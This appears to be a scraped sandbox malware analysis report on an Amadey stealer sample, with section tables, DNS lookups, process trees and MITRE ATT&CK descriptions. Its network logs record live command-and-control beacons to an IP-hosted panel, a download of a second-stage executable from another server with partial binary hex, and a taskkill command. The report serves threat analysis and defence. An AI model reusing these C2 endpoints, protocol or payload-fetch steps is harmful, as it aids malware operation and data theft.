	0x1000	0x68000	0x68000	0b0464d7e1472bfbf1c4208c6acbf156	False	0.5611971341646634	data	7.046743626172911	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x5d4	0x400	e97f6619ed7e3576cd4dea5db442a151	False	0.7119140625	data	5.8515810468292555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qplxvkoi	0x6b000	0x2ab000	0x2aa800	3ce65ecaf098a09c3500c7d1c9de4e4d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cuoxomvg	0x316000	0x1000	0x600	7b0b29f46b76944f7ff279e2324b3de9	False	0.5911458333333334	data	5.013549795698064	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x317000	0x3000	0x2200	6bb485c5ca7c65a46ac86c601af9d95d	False	0.0625	DOS executable (COM)	0.8113182551103354	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x3150bc	0x3e4	XML 1.0 document, ASCII text			0.48092369477911645
RT_MANIFEST	0x3154a0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 09:51:07.073455095 CET	58876	53	192.168.2.6	1.1.1.1
Jan 3, 2025 09:52:02.374289036 CET	58348	53	192.168.2.6	1.1.1.1
Jan 3, 2025 09:52:02.385818958 CET	53	58348	1.1.1.1	192.168.2.6

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 09:51:07.082813025 CET	1.1.1.1	192.168.2.6	0x2243	No error (0)	fluid-draw.sourceforge.io	prwebsecure.sourceforge.io.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 09:52:02.385818958 CET	1.1.1.1	192.168.2.6	0x9f4c	No error (0)	sexo.gofile.fun		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:52:02.385818958 CET	1.1.1.1	192.168.2.6	0x9f4c	No error (0)	sexo.gofile.fun		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:52:02.385818958 CET	1.1.1.1	192.168.2.6	0x9f4c	No error (0)	sexo.gofile.fun		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:52:02.385818958 CET	1.1.1.1	192.168.2.6	0x9f4c	No error (0)	sexo.gofile.fun		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:52:02.385818958 CET	1.1.1.1	192.168.2.6	0x9f4c	No error (0)	sexo.gofile.fun		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:52:02.385818958 CET	1.1.1.1	192.168.2.6	0x9f4c	No error (0)	sexo.gofile.fun		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:52:02.385818958 CET	1.1.1.1	192.168.2.6	0x9f4c	No error (0)	sexo.gofile.fun		104.21.32.1	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:51:04.062516928 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 3, 2025 09:51:04.782152891 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 08:51:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:51:06.300055981 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 3, 2025 09:51:07.047945023 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 08:51:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 63 35 0d 0a 20 3c 63 3e 31 30 32 39 31 39 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 35 63 31 66 65 65 39 30 31 61 37 64 36 38 30 31 32 66 65 61 31 64 65 38 64 37 63 34 62 35 65 38 66 37 62 32 63 34 36 64 39 35 34 34 30 32 62 37 35 63 61 62 35 65 35 37 34 32 31 62 39 64 63 34 65 31 23 31 30 32 39 34 32 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 65 32 36 63 35 31 38 31 63 65 62 30 36 62 31 31 63 31 63 30 33 34 32 39 65 64 34 64 32 32 66 38 35 62 62 39 61 35 35 33 36 65 36 23 31 30 32 39 37 35 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 35 36 63 38 61 30 65 35 65 62 66 35 64 65 30 34 33 34 39 30 32 35 30 38 30 64 39 23 31 30 32 39 37 35 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 [TRUNCATED] Data Ascii: 5c5 <c>1029193001+++b5937c1ad0c0f9c35c1fee901a7d68012fea1de8d7c4b5e8f7b2c46d954402b75cab5e57421b9dc4e1#1029428001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9e26c5181ceb06b11c1c03429ed4d22f85bb9a5536e6#1029758001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc56c8a0e5ebf5de04349025080d9#1029759001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1029760001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc770934541bf5dab5e45425197d1aa1daaa8#1029761001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1029762001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1029763001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1029764001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1029765001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1029766001+++fc8f7c1ed3c0f9c3 [TRUNCATED]
Jan 3, 2025 09:51:07.047960043 CET	432	IN	Data Raw: 38 62 31 35 65 61 61 34 39 35 63 34 39 23 31 30 32 39 37 36 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 30 37 Data Ascii: 8b15eaa495c49#1029767001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc076865555f141e542404358d6d9fc1d#1029768001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc07e804d03ac52ea484b411b9dc4e1#1029769001+++b5937c1a99d5f9df0b5daf

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:51:47.240118980 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 32 39 31 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1029193001&unit=246122658369
Jan 3, 2025 09:51:47.969676971 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 08:51:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:51:47.978490114 CET	66	OUT	GET /files/5979055508/wfhVWWv.exe HTTP/1.1 Host: 31.41.244.11
Jan 3, 2025 09:51:48.665302038 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 08:51:48 GMT Content-Type: application/octet-stream Content-Length: 14379809 Last-Modified: Thu, 02 Jan 2025 22:38:31 GMT Connection: keep-alive ETag: "67771567-db6b21" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 3d 90 33 30 5c fe 60 30 5c fe 60 30 5c fe 60 7b 24 fd 61 37 5c fe 60 7b 24 fb 61 84 5c fe 60 7b 24 fa 61 3a 5c fe 60 20 d8 03 60 33 5c fe 60 20 d8 fd 61 39 5c fe 60 20 d8 fa 61 21 5c fe 60 20 d8 fb 61 18 5c fe 60 7b 24 ff 61 3b 5c fe 60 30 5c ff 60 ab 5c fe 60 7b d9 fa 61 29 5c fe 60 7b d9 fc 61 31 5c fe 60 52 69 63 68 30 5c fe 60 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 64 0b 77 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 a0 02 00 00 6c 01 00 00 00 00 00 20 ce 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 04 00 00 04 00 00 d5 a5 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$t=30\`0\`0\`{$a7\`{$a\`{$a:\` `3\` a9\` a!\` a\`{$a;\`0\`\`{a)\`{a1\`Rich0\`PEddwg")l @`4xph@8"d@@.textp `.rdata(*,@@.dataS@.pdata8"@$@@.rsrchp@@.relocd@B
Jan 3, 2025 09:51:48.665348053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 e8 7f ee 00 00 8b 08 48 8b 05 ee cf 03 00 89 08 e8 77 ee 00 Data Ascii: H(HwHHHHHH('H#H\$Ht$ LD$WATAUAVAWH0L3HLDIHA$5LHuIVH)l!AVE3HI
Jan 3, 2025 09:51:48.665360928 CET	448	IN	Data Raw: 21 48 8d 55 12 48 8d 0d 22 a4 02 00 e8 65 12 00 00 33 c0 48 8b 5c 24 68 48 83 c4 30 41 5f 41 5e 5d c3 8b 55 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 73 f2 00 00 85 c0 79 23 e8 9e 3a 01 00 4c 8d 4d 12 4c 8d 05 1b a4 02 00 48 8d 0d 50 a4 02 00 Data Ascii: !HUH"e3H\$hH0A_A^]UE3HIsy#:LMLHPM:LHu*]h:LM\$ L1H>}uME3HIb]Ht$PIH\|$XLd$`Ht7A DI;HMAIGHH~
Jan 3, 2025 09:51:48.665371895 CET	1236	IN	Data Raw: 4f 12 4c 8d 05 5d a3 02 00 48 8d 0d 8a a3 02 00 8b 10 e8 9f 12 00 00 4c 8b 64 24 60 b8 ff ff ff ff 48 83 c4 38 5f 5b c3 48 8d 15 3b a2 02 00 4c 89 7c 24 20 48 8b cb e8 1a 2f 00 00 4c 8b f8 48 85 c0 75 1a 48 8d 57 12 48 8d 0d 1f a2 02 00 e8 62 10 Data Ascii: OL]HLd$`H8_[H;L\|$ H/LHuHWHbiWE3HIwy(8LOLHT! uE3MHILl$03A Lt$(A8LHu(:8LOLH
Jan 3, 2025 09:51:48.665384054 CET	1236	IN	Data Raw: 00 00 e9 06 01 00 00 8b 54 24 30 4c 8b cf 41 b8 01 00 00 00 48 8b c8 e8 c2 e8 00 00 48 83 f8 01 73 1f e8 23 34 01 00 4c 8d 05 4c 9f 02 00 48 8d 0d 19 9d 02 00 8b 10 e8 a6 0d 00 00 e9 cc 00 00 00 8b 44 24 30 48 8b cf 48 03 83 08 10 00 00 48 89 83 Data Ascii: T$0LAHHs#4LLHD$0HHHtH4wHH;D_fo3A\|of8HH\|JAtdtntxt2
Jan 3, 2025 09:51:48.665395021 CET	448	IN	Data Raw: 00 48 8b 8f 38 20 00 00 ba 30 00 00 00 ff 15 7b 94 02 00 4c 8b 87 48 20 00 00 41 b9 01 00 00 00 48 8b 8f 40 20 00 00 ba 30 00 00 00 ff 15 5c 94 02 00 48 8b 8f 30 20 00 00 4c 8d 4f 28 45 33 c0 ba 0c 00 00 00 ff 15 43 94 02 00 4c 8b 4f 20 45 33 c0 Data Ascii: H8 0{LH AH@ 0\H0 LO(E3CLO E3H8 *HOHT$`tDD$lHT$hfD+D$df+T$`H$pH3L$I[Ik Is(I_H\$WH IHtftZt(uA@f;wA
Jan 3, 2025 09:51:48.665492058 CET	1236	IN	Data Raw: 00 00 33 ff 0f b7 86 5e 20 00 00 48 89 7c 24 30 89 7c 24 3c 8d 14 49 8b cd 2b ca 48 8b 96 48 20 00 00 2b c8 89 4c 24 38 48 85 d2 74 0c 48 8b cb ff 15 40 8e 02 00 48 8b f8 48 8d 56 28 c7 44 24 20 50 25 00 00 4c 8d 4c 24 30 41 b8 ff ff ff ff 48 8b Data Ascii: 3^ H\|$0\|$<I+HH +L$8HtH@HHV(D$ P%LL$0AHMHH tHHH0 HT$<f+T$4` D^ f;D$(fCL$ X H( DX D$(f\$ f^ f
Jan 3, 2025 09:51:48.665503979 CET	1236	IN	Data Raw: 00 00 48 33 cc e8 20 9f 00 00 48 81 c4 38 20 00 00 5f 5e 5d 5b c3 cc cc cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 48 83 ec 38 49 8b f0 48 8d 6c 24 78 48 8b da 48 8b f9 e8 6b e9 ff ff 48 89 6c 24 28 4c 8b ce 4c 8b c3 48 c7 44 24 20 00 00 00 Data Ascii: H3 H8 _^][LD$LL$ SUVWH8IHl$xHHkHl$(LLHD$ HHHP%HH8_^][HL$HT$LD$LL$ SUVWAV@H+HH3H$0HL$xH\|$03+DLHHL$0HD$
Jan 3, 2025 09:51:48.665513992 CET	448	IN	Data Raw: b8 40 20 00 00 e8 4c 9d 00 00 48 2b e0 48 8b 05 c2 b4 03 00 48 33 c4 48 89 84 24 30 20 00 00 48 8b e9 4c 8d b4 24 78 20 00 00 48 8d 7c 24 30 bb 00 10 00 00 33 f6 e8 cb 26 01 00 44 8b c8 4c 8d 05 99 90 02 00 48 8d 05 92 91 02 00 8b d3 48 8d 4c 24 Data Ascii: @ LH+HH3H$0 HL$x H\|$03&DLHHL$0HD$ xHcH\|$0+IH<OHcSLt$(LLHD$ HHH8 HT$0A0L3HBH$0 H3H@ A^_^][LD$LL$ SUV
Jan 3, 2025 09:51:48.665537119 CET	1236	IN	Data Raw: 8b ce 48 8b ce e8 7c f9 ff ff 85 c0 78 0d 48 63 c8 2b f8 41 0f 48 fd 48 8d 34 4e 4c 89 6c 24 30 41 b9 00 04 00 00 89 7c 24 28 45 8b c4 33 d2 48 89 74 24 20 b9 00 10 00 00 ff 15 5f 83 02 00 85 c0 75 12 48 63 d7 4c 8d 05 39 8f 02 00 48 8b ce e8 31 Data Ascii: H\|xHc+AHH4NLl$0A\|$(E3Ht$ _uHcL9H1HT$@AL3HByH$@ H3HX A_A^A]A\_^][H\$VWAUAVAWH0HXLH.AIHE3LHHLd$hHQ
Jan 3, 2025 09:51:48.670217991 CET	1236	IN	Data Raw: 10 00 00 41 5f 41 5d 5e c3 48 8b 05 f2 eb 03 00 4c 8d 44 24 38 48 8d 54 24 30 48 8d 4c 24 40 ff 15 8d 82 02 00 48 8b 05 de eb 03 00 4c 8d 44 24 38 48 8d 54 24 30 48 8d 4c 24 40 ff 15 71 82 02 00 48 8b 4c 24 30 33 f6 48 8b 05 33 ec 03 00 ff 15 5d Data Ascii: A_A]^HLD$8HT$0HL$@HLD$8HT$0HL$@qHL$03H3]HHHPJHtHrHHH*Ax0tHqLD$8AHT$0HL$@LD$8HHYHT$0HL$@H:HKLH

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:52:01.239772081 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 32 39 34 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1029428001&unit=246122658369
Jan 3, 2025 09:52:01.934129000 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 08:52:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Target ID:	0
Start time:	03:49:55
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\Fi3ptS6O8D.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Fi3ptS6O8D.exe"
Imagebase:	0x330000
File size:	3'237'376 bytes
MD5 hash:	37083B063FB068C71CC025F842D985A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2140865774.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	03:49:57
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x5f0000
File size:	3'237'376 bytes
MD5 hash:	37083B063FB068C71CC025F842D985A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2158787674.00000000005F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	03:49:58
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x5f0000
File size:	3'237'376 bytes
MD5 hash:	37083B063FB068C71CC025F842D985A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	8
Start time:	03:51:44
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"
Imagebase:	0x180000
File size:	50'265'898 bytes
MD5 hash:	26F7294CA7A10C65B44057525A233636
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 9%, ReversingLabs
Reputation:	low
Has exited:	false

Target ID:	9
Start time:	03:51:54
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"
Imagebase:	0x180000
File size:	50'265'898 bytes
MD5 hash:	26F7294CA7A10C65B44057525A233636
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	28
Start time:	03:51:55
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill.exe /F /IM "svdhost.exe"
Imagebase:	0x4f0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Fi3ptS6O8D.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\rsn[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\wfhVWWv[1].exe

C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe

C:\Users\user\AppData\Local\Temp\4z5zud

C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_ARC4.pyd

C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_Salsa20.pyd

C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_chacha20.pyd

C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_aes.pyd

C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_aesni.pyd

C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_arc2.pyd

C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_blowfish.pyd

C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cast.pyd

Windows Analysis Report
Fi3ptS6O8D.exe

Target ID:	39
Start time:	03:51:58
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe"
Imagebase:	0x7ff7c4840000
File size:	14'379'809 bytes
MD5 hash:	E8A21B7C1DBF57E585F28C10631647CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	false

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	754
Total number of Limit Nodes:	24

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	617
Total number of Limit Nodes:	4

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1930
Total number of Limit Nodes:	9

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.2%
Total number of Nodes:	1159
Total number of Limit Nodes:	109

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	89

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre